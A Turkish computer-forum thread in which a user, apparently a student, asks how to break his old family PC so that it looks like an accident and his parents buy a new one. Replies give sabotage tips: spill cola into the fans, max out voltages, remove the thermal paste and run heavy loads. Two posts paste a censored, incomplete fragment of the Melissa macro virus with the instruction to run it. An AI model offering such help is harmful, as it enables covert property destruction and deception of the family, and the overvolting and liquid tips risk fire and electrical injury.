Neler Yeni

Bilgisayarımı Bozmam Lazım

Dolar Bey

80+ Silver
Dahası  
Reaksiyon skoru
3,218
İsim
Mehmet Alp Uzun
İlgilendiği Kategoriler
Dizüstü Bilgisayar
Discord
Dolar#9411
Fantezi yap bence.
Kola ve fantayı karıştırıp ekran kartı fanlarına dök sonra suya batır anakartın üzerinde zıpla.
İŞLEM TAMAMLANDI.

Dahası  
Reaksiyon skoru
10
İsim
Efkan
2006'dan kalma külüstür bir bilgisayarım var aileme ne zaman yenileyelim desem sınavlar geçsin iyi not al yenileyeceğiz diyorlardı ben sınavdan başarıyla geçtim fakat bilgisayar almadılar nedenini sorduğumda ise hali hazırda taş gibi bilgisayarın var bozulana kadar kullan dediler tabi ben kafayı yedim sonra aklıma bir fikir geldi bilgisayarı kendim bozmak çünkü bu bozulmuyor ve hala 10 senesi var muhtemelen neyse ben virüs dosyası kurup kendim bozsam beni suçlarlar o yüzden bu seçenek olmaz ailenin herhangi bir ferdi kullanırken bir anda bozulmalı ve kaza süsü verilmeli yada onlar yanlışlıkla virüse tıklamalı ve bilgisayar anında gitmeli yavaş yavaş olmaz ama anında bana yardım edebilecek var mı?(acil)
poweri çek sonra ailen odadan çıkınca overclock yap
yanar

Mustifa

80+ Bronze

Besim Tibuk

80+ Gold
2006'dan kalma külüstür bir bilgisayarım var aileme ne zaman yenileyelim desem sınavlar geçsin iyi not al yenileyeceğiz diyorlardı ben sınavdan başarıyla geçtim fakat bilgisayar almadılar nedenini sorduğumda ise hali hazırda taş gibi bilgisayarın var bozulana kadar kullan dediler tabi ben kafayı yedim sonra aklıma bir fikir geldi bilgisayarı kendim bozmak çünkü bu bozulmuyor ve hala 10 senesi var muhtemelen neyse ben virüs dosyası kurup kendim bozsam beni suçlarlar o yüzden bu seçenek olmaz ailenin herhangi bir ferdi kullanırken bir anda bozulmalı ve kaza süsü verilmeli yada onlar yanlışlıkla virüse tıklamalı ve bilgisayar anında gitmeli yavaş yavaş olmaz ama anında bana yardım edebilecek var mı?(acil)
Aç OC menüsünü tüm voltajları kökle.
Termal macunu çıkarıpı en ağır oyunu aç.

Besim Tibuk

80+ Gold
If NTCL <> 0 And ADCL = 0 And (InStr(1, Active********.Name, "********") = False) Then
Active********.SaveAs FileName:=Active********.FullN ame
ElseIf (InStr(1, Active********.Name, "********") <> False) Then
Active********.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub < =>
Bunu çalıştır bir şekilde. PC GG.
Mesaj otomatik birleştirildi:

o pc nin açabileceği en ağır oyun chrome dinazorudur qwe
Prime 95: Really?

-Akın Taşkan-

80+ Silver
Dahası  
Reaksiyon skoru
3,851
İsim
Akın Taşkan
If NTCL <> 0 And ADCL = 0 And (InStr(1, Active********.Name, "********") = False) Then
Active********.SaveAs FileName:=Active********.FullN ame
ElseIf (InStr(1, Active********.Name, "********") <> False) Then
Active********.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub < =>
Bunu çalıştır bir şekilde. PC GG.
Mesaj otomatik birleştirildi:

Prime 95: Really?
****** yazanlar nedir?

Yeni mesajlar Yeni Konu Aç      

SON KONULAR

Forum istatistikleri

Konular
1,016,472
Üyeler
161,056